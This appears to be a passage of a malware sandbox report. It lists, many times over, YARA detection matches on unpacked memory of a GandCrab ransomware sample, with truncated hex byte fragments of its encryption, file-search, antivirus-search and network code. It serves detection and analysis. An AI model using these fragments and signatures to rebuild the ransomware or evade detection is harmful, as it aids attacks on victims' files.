44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
2.3.ssapst.exe.3640000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
2.3.ssapst.exe.3640000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
2.3.ssapst.exe.3640000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
2.3.ssapst.exe.3640000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
2.3.ssapst.exe.3640000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
2.3.ssapst.exe.3640000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
2.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
2.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
2.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
2.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
2.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
2.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
2.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
4.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
4.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
4.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
4.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
4.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
4.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
4.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
4.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
4.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
4.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
4.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
4.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
4.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
15.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
15.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
15.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
15.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
15.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
15.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
26.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
26.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
26.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
26.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
26.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
26.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
14.3.ssapst.exe.3730000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
14.3.ssapst.exe.3730000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
14.3.ssapst.exe.3730000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
14.3.ssapst.exe.3730000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
14.3.ssapst.exe.3730000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
14.3.ssapst.exe.3730000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
31.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
31.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
31.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
31.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
31.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
31.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
33.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
33.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
33.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
33.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
33.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
33.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
2.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
2.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
2.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
2.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
2.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
2.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
32.3.ssapst.exe.3790000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
32.3.ssapst.exe.3790000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
32.3.ssapst.exe.3790000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
32.3.ssapst.exe.3790000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
32.3.ssapst.exe.3790000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
